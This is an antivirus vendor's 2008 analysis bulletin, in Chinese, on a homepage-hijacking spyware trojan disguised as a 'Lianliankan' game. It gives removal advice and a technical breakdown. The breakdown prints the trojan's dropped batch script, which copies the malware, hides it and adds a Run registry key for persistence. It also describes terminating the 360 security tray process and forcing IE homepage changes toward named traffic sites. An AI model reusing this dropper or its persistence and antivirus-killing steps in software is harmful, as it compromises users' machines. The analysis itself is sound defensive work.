捕获时间
2008-10-16
病毒摘要
该样本是使用“VB”编写的“间谍程序”,由微点主动防御软件自动捕获,长度为“57,344 字节”,图标为,使用“exe”扩展名并模拟“连连看”版本信息,通过“网页木马”、“诱惑用户下载”等途径植入用户计算机,病毒主要修改用户主页为指定网站刷流量。
感染对象
Windows 2000/Windows XP/Windows 2003
传播途径
网页木马、文件捆绑
防范措施
已安装使用微点主动防御软件的用户,无须任何设置,微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本,微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版,微点主动防御软件在发现该病毒后将报警提示您发现“未知木马”,请直接选择删除处理(如图1);
图1 主动防御自动捕获未知病毒(未升级)
如果您已经将微点主动防御软件升级到最新版本,微点将报警提示您发现"Trojan-Spy.Win32.StartPage.l”,请直接选择删除(如图2)。
图2 升级后截获已知病毒
对于未使用微点主动防御软件的用户,微点反病毒专家建议:
1、不要在不明站点下载非官方版本的软件进行安装,避免病毒通过捆绑的方式进入您的系统。
2、尽快将您的杀毒软件特征库升级到最新版本进行查杀,并开启防火墙拦截网络异常访问,如依然有异常情况请注意及时与专业的安全软件厂商联系获取技术支持。
3、开启windows自动更新,及时打好漏洞补丁。
病毒分析
该样本程序被执行后,释放批处理文件“Boot.bat”并执行,其批处理文件的内容如下:
|
@ECHO off
color 0A
copy sample.exe C:\SCVSHTO.exe >nul
copy sample.exe D:\连连看2.3.exe >nul
attrib r s h C:\SCVSHTO.exe >nul
@REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SCVSHTO /t REG_SZ /d C:\SCVSHTO.exe /f
del %0 |
|
批处理被执行后会在C盘和D盘根目录下生成病毒副本“SCVSHTO.exe”与“连连看2.3.exe”,设置“SCVSHTO.exe”属性为“只读”、“系统”、“隐藏”,并修改注册表实现开机自启动。
病毒主程序运行后,在C盘根目录下释放病毒文件“notoped.exe”,并创建该进程与“SCVSHTO.exe”进程互相守护,设置其属性为“系统”、“隐藏”;修改如下注册表使其开机自启动:
项:
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
键值:pagofile
指向数据:c:\notoped.exe |
|
病毒文件“notoped.exe”运行后,循环遍历进程查找“360tray.exe”,找到后将其关闭;修改如下注册表隐藏原IE快捷方式:
项:
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu
键值:{871C5380-42A0-1069-A2EA-08002B30309D}
指向数据:01 |
|
生成新IE快捷方式并修改如下注册表设置IE默认主页。
项:
|
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
键值:Start Page
指向数据:http://www.dxcpm.com/?55_当前日期时间 |
|
设置定时器定期访问如下网页:
|
http://gp.dxcpm.com/ete.htm
http://www.dxcpm.com/sogou.htm |
|
访问 http://tj.boxcpm.cn/tj.aspx? 55_当前日期时间 进行访问统计。